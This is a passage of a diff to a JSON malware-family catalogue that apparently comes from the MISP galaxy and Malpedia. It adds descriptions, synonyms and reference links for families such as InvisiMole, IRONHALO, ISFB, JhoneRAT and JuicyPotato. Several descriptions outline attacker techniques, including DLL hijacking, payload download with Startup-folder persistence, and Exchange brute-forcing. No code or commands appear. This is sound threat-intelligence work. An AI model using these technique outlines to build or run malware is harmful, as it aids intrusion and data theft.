"https://malpedia.caad.fkie.fraunhofer.de/details/win.infodot", + "https://id-ransomware.blogspot.com/2019/10/infodot-ransomware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e0ce5055-45cd-46d2-971f-bb3904ec43a1", + "value": "InfoDot Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.infy", - "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", - "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", - "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", "https://github.com/pan-unit42/iocs/blob/master/prince_of_persia/hashes.csv", - "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/" + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/", + "https://cloud.tencent.com/developer/article/1738806", + "https://www.intezer.com/prince-of-persia-the-sands-of-foudre/", + "http://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/", + "https://researchcenter.paloaltonetworks.com/2017/08/unit42-prince-persia-ride-lightning-infy-returns-foudre/", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/393/Bitdefender-Whitepaper-Iranian-APT-Makes-a-Comeback-with-Thunder-and-Lightning-Backdoor-and-Espionage-Combo.pdf", + "https://research.checkpoint.com/2021/after-lightning-comes-thunder/", + "https://researchcenter.paloaltonetworks.com/2016/05/prince-of-persia-infy-malware-active-in-decade-of-targeted-attacks/" ], "synonyms": [ "Foudre" @@ -9789,11 +18354,39 @@ "value": "InnaputRAT" }, { - "description": "", + "description": "InnifiRAT is coded in .NET and targets personal data on infected devices, with it's top priority appearing to be bitcoin and litecoin wallet data.\r\n\r\nInffiRAT also includes a backdoor which allows attackers to control the infected host remotely. Possibilities include loggin key stroke, taking pictures with webcam, accessing confidential information, formatting drives, and more.\r\n\r\nIt attempts to steal browser cookies to steal usernames and passwords and monitors the users activities with screenshot functionality. \r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.innfirat", + "https://www.zscaler.com/blogs/research/innfirat-new-rat-aiming-your-cryptocurrency-and-more" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b6aec7a7-7ebc-4aad-bcdf-1c3cb7044e3c", + "value": "win.innfirat" + }, + { + "description": "ESET noticed attacks against aerospace and military companies in Europe and the Middle East that took place between September and December 2019, which featured this family. They found a number of hints that points towards Lazarus as potential origin.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.interception", + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_Operation_Interception.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fa022849-248c-4620-86b4-2a36c704b288", + "value": "Interception" + }, + { + "description": "InvisiMole had a modular architecture, starting with a wrapper DLL, and performing its activities using two other modules that were embedded in its resources, named RC2FM and RC2CL. They were feature-rich backdoors and turned the affected computer into a video camera, letting the attackers to spy the victim. \r\nThe malicious actors behind this malware were active at least since 2013 in highly targeted campaigns with only a few dozen compromised computers in Ukraine and Russia. The wrapper DLL posed as a legitimate mpr.dll library and was placed in the same folder as explorer.exe, which made it being loaded during the Windows startup into the Windows Explorer process instead of the legitimate library.\r\nMalware came in both 32-bit and 64-bit versions, which made this persistence technique functional on both architectures.\r\n\r\nThe smaller of the modules, RC2FM, contained a backdoor with fifteen supported commands indexed by numbers. The commands could perform simple changes on the system and spying features like capturing sounds, taking screenshots or monitoring all fixed and removable drives.\r\n\r\nThe second module, RC2CL, offered features for collecting as much data about the infected computer as possible, rather than for making system changes. The module supported up to 84 commands such as file system operations, file execution, registry key manipulation, remote shell activation, wireless network scanning, listing of installed software etc. Though the backdoor was capable of interfering with the system (e.g. to log off a user, terminate a process or shut down the system), it mostly provided passive operations. Whenever possible, it tried to hide its activities by restoring the original file access time or safe-deleting its traces. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.invisimole", - "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/" + "https://www.welivesecurity.com/2018/06/07/invisimole-equipped-spyware-undercover/", + "https://www.welivesecurity.com/2020/06/18/digging-up-invisimole-hidden-arsenal/", + "https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf" ], "synonyms": [], "type": [] @@ -9802,13 +18395,28 @@ "value": "InvisiMole" }, { - "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user’s Startup folder.", + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironcat", + "https://aaronrosenmund.com/blog/2020/09/26/ironcat-ransmoware/", + "https://twitter.com/demonslay335/status/1308827693312548864" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c6fc8419-afb1-4e99-a6cf-4288ead2381b", + "value": "Ironcat" + }, + { + "description": " IRONHALO is a downloader that uses the HTTP protocol to retrieve a Base64 encoded payload from a hard-coded command-and-control (CnC) server and uniform resource locator (URL) path.\r\n The encoded payload is written to a temporary file, decoded and executed in a hidden window. The encoded and decoded payloads are written to files named igfxHK[%rand%].dat and igfxHK[%rand%].exe respectively, where [%rand%] is a 4-byte hexadecimal number based on the current timestamp. It persists by copying itself to the current user\u2019s Startup folder.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironhalo", "https://www.symantec.com/security-center/writeup/2015-122210-5128-99", + "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html", "https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html", - "https://www.fireeye.com/blog/threat-research/2015/12/the_eps_awakens.html" + "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko" ], "synonyms": [], "type": [] @@ -9822,28 +18430,65 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isfb", "https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/", + "https://www.fortinet.com/blog/threat-research/new-variant-of-ursnif-continuously-targeting-italy", "https://blog.talosintelligence.com/2019/01/amp-tracks-ursnif.html", "https://blog.minerva-labs.com/attackers-insert-themselves-into-the-email-conversation-to-spread-malware", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", "https://lokalhost.pl/gozi_tree.txt", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-010.pdf", "https://isc.sans.edu/forums/diary/Reviewing+the+spam+filters+Malspam+pushing+GoziISFB/23245", + "https://www.fidelissecurity.com/threatgeek/threat-intelligence/gozi-v3-technical-update/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "http://blog.talosintelligence.com/2018/03/gozi-isfb-remains-active-in-2018.html", "https://securityintelligence.com/meet-goznym-the-banking-malware-offspring-of-gozi-isfb-and-nymaim/", + "https://www.cyberbit.com/new-ursnif-malware-variant/", "https://www.cylance.com/en_us/blog/threat-spotlight-ursnif-infostealer-malware.html", - "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware", "https://www.youtube.com/watch?v=KvOpNznu_3w", - "https://www.rsa.com/de-de/resources/pandemiya-emerges-new-malware-alternative-zeus-based", + "https://blog.yoroi.company/research/ursnif-long-live-the-steganography/", + "https://0xc0decafe.com/malware-analysts-guide-to-aplib-decompression/", "https://www.youtube.com/watch?v=jlc7Ahp8Iqg", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://news.sophos.com/en-us/2019/12/24/gozi-v3-tracked-by-their-own-stealth/", "http://benkow.cc/DreambotSAS19.pdf", + "https://malware.love/malware_analysis/reverse_engineering/2020/11/27/analyzing-a-vbs-dropper.html", "https://blog.malwarebytes.com/threat-analysis/2017/04/binary-options-malvertising-campaign-drops-isfb-banking-trojan/", - "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", + "https://blog.talosintelligence.com/2020/07/valak-emerges.html", + "https://labs.sentinelone.com/enter-the-maze-demystifying-an-affiliate-involved-in-maze-snow/", "https://journal.cecyf.fr/ojs/index.php/cybin/article/view/15", "https://0ffset.net/reverse-engineering/analyzing-com-mechanisms-in-malware/", + "https://www.vkremez.com/2018/08/lets-learn-in-depth-reversing-of-recent.html", + "https://isc.sans.edu/forums/diary/German+language+malspam+pushes+Ursnif/25732/", + "https://0ffset.net/reverse-engineering/malware-analysis/analyzing-isfb-second-loader/", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-ursnif-infections/", + "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", "https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html", + "https://www.tgsoft.it/files/report/download.asp?id=568531345", + "https://blog.yoroi.company/research/the-ursnif-gangs-keep-threatening-italy/", + "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://0ffset.net/reverse-engineering/malware-analysis/analysing-isfb-loader/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf", + "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", + "https://www.hornetsecurity.com/en/security-information/firefox-send-sends-ursnif-malware/", "https://arielkoren.com/blog/2016/11/01/ursnif-malware-deep-technical-dive/", + "https://www.proofpoint.com/us/threat-insight/post/coronavirus-threat-landscape-update", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", + "https://www.vmray.com/cyber-security-blog/analyzing-ursnif-behavior-malware-sandbox/", + "https://www.fortinet.com/blog/threat-research/ursnif-variant-spreading-word-document.html", "https://github.com/gbrindisi/malware/tree/master/windows/gozi-isfb", + "https://www.cyberbit.com/blog/endpoint-security/new-ursnif-malware-variant/", "https://blog.yoroi.company/research/ursnif-the-latest-evolution-of-the-most-popular-banking-malware/", - "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" + "https://blog.morphisec.com/obfuscated-vbscript-drops-zloader-ursnif-qakbot-dridex", + "https://redcanary.com/resources/webinars/deep-dive-process-injection/", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", + "https://www.tgsoft.it/files/report/download.asp?id=7481257469", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://github.com/mlodic/ursnif_beacon_decryptor", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + "https://research.checkpoint.com/2020/gozi-the-malware-with-a-thousand-faces/", + "https://blog.morphisec.com/ursnif/gozi-delivery-excel-macro-4.0-utilization-uptick-ocr-bypass" ], "synonyms": [ "Gozi ISFB", @@ -9860,6 +18505,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismagent", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", "http://www.clearskysec.com/ismagent/", "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/" ], @@ -9874,8 +18520,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ismdoor", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia", "http://www.clearskysec.com/greenbug/", - "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" + "https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon", + "https://web.archive.org/web/20190331181353/https://www.symantec.com/connect/blogs/greenbug-cyberespionage-group-targeting-middle-east-possible-links-shamoon" ], "synonyms": [], "type": [] @@ -9888,7 +18536,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ispy_keylogger", - "https://www.zscaler.com/blogs/research/ispy-keylogger" + "https://www.zscaler.com/blogs/research/ispy-keylogger", + "https://www.secureworks.com/research/threat-profiles/gold-skyline" ], "synonyms": [], "type": [] @@ -9927,9 +18576,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.isspace", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", + "https://wikileaks.org/vault7/document/2015-09-20150911-280-CSIT-15085-NfLog/2015-09-20150911-280-CSIT-15085-NfLog.pdf", + "https://unit42.paloaltonetworks.com/watering-hole-attack-on-aerospace-firm-exploits-cve-2015-5122-to-install-isspace-backdoor/", + "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", + "https://www.secureworks.com/research/threat-profiles/bronze-express" + ], + "synonyms": [ + "NfLog RAT" ], - "synonyms": [], "type": [] }, "uuid": "a3f41c96-a5c8-4dfe-b7fa-d9d75f97979a", @@ -9939,8 +18594,20 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos", - "https://www.trustwave.com/Resources/SpiderLabs-Blog/JackPOS-%E2%80%93-The-House-Always-Wins/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ixware", + "https://fr3d.hk/blog/ixware-kids-will-be-skids" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5710dffa-ec02-4e5c-848e-47af13f729d7", + "value": "IXWare" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jackpos" ], "synonyms": [], "type": [] @@ -9953,9 +18620,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jaff", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "http://malware-traffic-analysis.net/2017/05/16/index.html", "https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart", - "http://blog.talosintelligence.com/2017/05/jaff-ransomware.html" + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] @@ -9994,6 +18662,22 @@ "uuid": "0f02ea79-5833-46e0-8458-c4a863a5a112", "value": "Jaku" }, + { + "description": "Jason is a graphic tool implemented to perform Microsoft exchange account brute-force in order to \u201charvest\u201d the highest possible emails and accounts information. Distributed in a ZIP container the interface is quite intuitive: the Microsoft exchange address and its version shall be provided. Three brute-force methods could be selected: EWS (Exchange Web Service), OAB (Offline Address Book) or both (All). Username and password list can be selected and threads number should be provided in order to optimize the attack balance.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jason", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", + "https://marcoramilli.com/2019/06/06/apt34-jason-project/", + "https://twitter.com/P3pperP0tts/status/1135503765287657472", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e101a605-c30f-4222-9549-4745d0d769cd", + "value": "jason" + }, { "description": "", "meta": { @@ -10021,6 +18705,38 @@ "uuid": "fea703ec-9b24-4119-96b3-7ae6bec3b203", "value": "JCry" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jeno", + "https://id-ransomware.blogspot.com/2020/04/jeno-ransomware.html" + ], + "synonyms": [ + "Jest", + "Valeria" + ], + "type": [] + }, + "uuid": "a1d7e117-4ca9-4d67-a4dd-53626827ed2f", + "value": "Jeno Ransomware" + }, + { + "description": "Cisco Talos identified JhoneRAT in January 2020. The RAT is delivered through cloud services (Google Drive) and also submits stolen data to them (Google Drive, Twitter, ImgBB, GoogleForms). The actors using JhoneRAT target Saudi Arabia, Iraq, Egypt, Libya, Algeria, Morocco, Tunisia, Oman, Yemen, Syria, UAE, Kuwait, Bahrain and Lebanon.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jhone_rat", + "https://unit42.paloaltonetworks.com/molerats-delivers-spark-backdoor/", + "https://www.cybereason.com/hubfs/dam/collateral/reports/Molerats-in-the-Cloud-New-Malware-Arsenal-Abuses-Cloud-Platforms-in-Middle-East-Espionage-Campaign.pdf", + "https://blog.talosintelligence.com/2020/01/jhonerat.html", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "6dd8c953-f500-46dd-bacf-78772222f011", + "value": "JhoneRAT" + }, { "description": "", "meta": { @@ -10052,8 +18768,14 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.joanap", "https://www.us-cert.gov/ncas/alerts/TA18-149A", + "https://www.secureworks.com/research/threat-profiles/nickel-academy", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/", "https://www.us-cert.gov/ncas/analysis-reports/AR18-149A", - "https://www.acalvio.com/lateral-movement-technique-employed-by-hidden-cobra/" + "https://app.box.com/s/xyyord0b806e6or2nh92coxw2areyyx4", + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.symantec.com/connect/blogs/attackers-target-dozens-global-banks-new-malware" ], "synonyms": [], "type": [] @@ -10105,7 +18827,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.jripbot", - "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/" + "https://securelist.com/blog/research/71275/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2017/10/20114955/Bartholomew-GuerreroSaade-VB2016.pdf" ], "synonyms": [], "type": [] @@ -10113,6 +18836,78 @@ "uuid": "e895a0d2-fe4b-4793-9440-9db2d56a97f2", "value": "JripBot" }, + { + "description": "JSOutProx is a sophisticated attack framework built using both Javascript and .NET. It uses the .NET (de)serialization feature to interact with a Javascript file which is the core module running on a victim machine. Once the malware is run on the victim, the framework can load several plugins performing additional malicious activities on the target.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jsoutprox", + "https://blog.yoroi.company/research/unveiling-jsoutprox-a-new-enterprise-grade-implant/", + "https://twitter.com/zlab_team/status/1208022180241530882", + "https://www.zscaler.com/blogs/research/targeted-attacks-indian-government-and-financial-institutions-using-jsoutprox-rat", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://www.fortinet.com/blog/threat-research/adversary-playbook-javascript-rat-looking-for-that-government-cheese" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5e4fbe90-c043-4ac3-9fd5-d9e7d9bb173f", + "value": "JSOutProx" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader", + "https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/FIN7%20JSSLOADER%20FINAL%20WEB.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5db89188-568d-40d2-9320-5fb4a06fbd51", + "value": "JSSLoader" + }, + { + "description": "As described on the Github repository page, \"A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\\SYSTEM\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato", + "https://github.com/ohpe/juicy-potato", + "https://lifars.com/wp-content/uploads/2020/06/Cryptocurrency-Miners-XMRig-Based-CoinMiner-by-Blue-Mockingbird-Group.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "4dc0dccf-ac68-4464-b193-6519ffe00617", + "value": "JuicyPotato" + }, + { + "description": "According to FireEye, JUMPALL is a malware dropper that has been observed \r\ndropping HIGHNOON/ZXSHELL/SOGU.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jumpall", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a08db33d-4c37-4075-bd49-c3ab66a339db", + "value": "JUMPALL" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.jupyter", + "https://redcanary.com/blog/yellow-cockatoo/", + "https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction", + "https://www.crowdstrike.com/blog/solarmarker-backdoor-technical-analysis/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "5b834445-4437-46a6-9d4d-673ecf4bf1b9", + "value": "Jupyter Stealer" + }, { "description": "", "meta": { @@ -10131,9 +18926,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karagany", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://www.secureworks.com/research/updated-karagany-malware-targets-energy-sector", + "https://www.secureworks.com/research/threat-profiles/iron-liberty", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2014/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf" + ], + "synonyms": [ + "Karagny" ], - "synonyms": [], "type": [] }, "uuid": "857e61fe-ccb2-426b-ad7b-696112f48dbb", @@ -10172,9 +18973,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.karkoff", - "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html" + "https://www.secureworks.com/research/threat-profiles/cobalt-edgewater", + "https://blog.talosintelligence.com/2019/04/dnspionage-brings-out-karkoff.html", + "https://blog.yoroi.company/research/karkoff-2020-a-new-apt34-espionage-operation-involves-lebanon-government/", + "https://blog.telsy.com/apt34-aka-oilrig-attacks-lebanon-government-entities-with-maildropper-implant/" + ], + "synonyms": [ + "CACTUSPIPE", + "MailDropper" ], - "synonyms": [], "type": [] }, "uuid": "a45c16d9-6945-428c-af46-0436903f9329", @@ -10199,7 +19006,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kazuar", - "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/" + "https://www.epicturla.com/blog/sysinturla", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "http://researchcenter.paloaltonetworks.com/2017/05/unit42-kazuar-multiplatform-espionage-backdoor-api-access/", + "https://securelist.com/sunburst-backdoor-kazuar/99981/" ], "synonyms": [], "type": [] @@ -10211,7 +19023,8 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kegotip", + "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] @@ -10219,14 +19032,31 @@ "uuid": "96bb088c-7bb7-4a07-a9d7-a3cbb45d5755", "value": "Kegotip" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kekw", + "https://id-ransomware.blogspot.com/2020/03/kekw-ransomware.html" + ], + "synonyms": [ + "KEKW-Locker" + ], + "type": [] + }, + "uuid": "b178de96-14a3-49f1-a957-c83f86e23e83", + "value": "KEKW Ransomware" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kelihos", "https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/", - "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", "https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/", + "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", + "https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/", + "https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/", "https://en.wikipedia.org/wiki/Kelihos_botnet" ], "synonyms": [], @@ -10240,8 +19070,18 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kerrdown", + "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/", + "https://tradahacking.vn/th%C6%B0%E1%BB%9Fng-t%E1%BA%BFt-fbcbbed49da7", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-1110.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://unit42.paloaltonetworks.com/tracking-oceanlotus-new-downloader-kerrdown/", - "https://blog.cystack.net/word-based-malware-attack/" + "https://www.amnesty.de/sites/default/files/2021-02/Amnesty-Bericht-Vietnam-Click-And-Bait-Blogger-Deutschland-Spionage-Menschenrechtsverteidiger-Februar-2021.pdf", + "https://blog.cystack.net/word-based-malware-attack/", + "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/", + "https://www.secureworks.com/research/threat-profiles/tin-woodlawn", + "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam" ], "synonyms": [], "type": [] @@ -10249,6 +19089,35 @@ "uuid": "bd9e21d1-7da3-4699-816f-0e368a63bc18", "value": "KerrDown" }, + { + "description": "Ketrican is a backdoor trojan used by APT 15.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrican", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://www.welivesecurity.com/2019/07/18/okrum-ke3chang-targets-diplomatic-missions/", + "https://www.verfassungsschutz.de/embed/broschuere-2020-06-bfv-cyber-brief-2020-01.pdf", + "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "86cd2563-b343-4cce-ac2d-a17afbc77dfd", + "value": "Ketrican" + }, + { + "description": "Intezer found this family mid May 2020, which appears to be a merger of the family Ketrican and Okrum.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ketrum", + "https://www.intezer.com/blog/research/the-evolution-of-apt15s-codebase-2020/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "99d6cb80-bae2-4a97-8ec7-401f9570f237", + "value": "Ketrum" + }, { "description": "KeyBase is a .NET credential stealer and keylogger that first emerged in February 2015. It often incorporates Nirsoft tools such as MailPassView and WebBrowserPassView for additional credential grabbing.", "meta": { @@ -10277,8 +19146,9 @@ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/", "https://citizenlab.ca/2016/11/parliament-keyboy/", - "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", - "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/" + "https://www.secureworks.com/research/threat-profiles/bronze-hobart", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html" ], "synonyms": [ "TSSL" @@ -10309,6 +19179,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble", "https://www.us-cert.gov/ncas/analysis-reports/AR18-221A", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://research.checkpoint.com/north-korea-turns-against-russian-targets/" ], "synonyms": [], @@ -10317,13 +19189,27 @@ "uuid": "0c213d7f-8c71-4341-aeb0-13be71fbf4e5", "value": "KEYMARBLE" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.kgh_spy", + "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite" + ], + "synonyms": [], + "type": [] + }, + "uuid": "d073b11a-a941-48b9-8e88-b59ffab9fcda", + "value": "KGH_SPY" + }, { "description": "", "meta": { "refs": [ 